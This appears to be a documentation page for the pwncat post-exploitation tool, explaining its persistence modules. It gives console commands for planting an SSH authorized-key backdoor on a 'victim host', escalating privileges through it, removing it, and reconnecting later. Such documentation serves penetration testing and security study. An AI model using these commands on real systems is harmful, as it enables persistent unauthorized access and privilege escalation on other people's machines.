Persistence¶

Persistence modules are implemented as sub-classes of the standard pwncat modules, and are placed under the persist package. Persistence methods provide an abstract way to install and utilize various persistence methods on the victim host.

An installed persistence method is tracked in the database, and can be utilized for escalation or reconnecting to a disconnected victim depending on the persistence module itself.

Listing Installed Modules¶

The persist.gather module is used to gather the installed modules on the victim host. This module is also used to remove persistence modules in bulk. To simply list all installed modules:

(local) pwncat$ run persist.gather

You can also specify any arguments available to persistence modules in the call to run in order to filter the results:

(local) pwncat$ run persist.gather user=bob

Installing Persistence¶

Persistence modules are installed by running the relevant module. For example, to install persistence as the user bob with the persist.authorized_key module, you can do the following:

(local) pwncat$ run persist.authorized_key user=bob backdoor_key=./backdoor_id_rsa

Removing Persistence¶

To remove a persistence module, you simply pass the remove argument to the module. It’s worth noting that the module arguments must be identical to the installed module in order to successfully remove the module. To simplify this, you can use the persist.gather module to locate and remove the module.

# Remove the module by explicitly specifying all parameters
(local) pwncat$ run persist.authorized_key remove user=bob backdoor_key=./backdoor_id_rsa
# Remove the module by locating it with persist.gather and removing it
(local) pwncat$ run persist.gather remove user=bob

Escalating Using Persistence¶

Escalation with installed persistence can be done by passing the escalate argument to the persistence module. Alternatively, it is recommended to simply utilize the escalate.auto module which will automatically select appropriate persistence modules if available.

# Escalate to bob via installed persistence
(local) pwncat$ run persist.authorized_key escalate user=bob backdoor_key=./backdoor_id_rsa
(local) pwncat$ run persist.gather escalate user=bob
# Recommended method
(local) pwncat$ run escalate.auto user=bob

Reconnecting to a Victim via Persistence¶

Remote persistence modules can be used to reconnect to a victim host. This is done with the connect command (or via the pwncat command line parameters). The reconnect protocol will achieve this:

# Reconnect as the specified user.
# Automatically select either an installed persistence method or prompt for ssh password
pwncat user@192.168.1.1
# Reconnect protocol explicitly
pwncat reconnect://user@192.168.1.1
# Reconnect with a specific module
pwncat reconnect://user:persist.authorized_key@192.168.1.1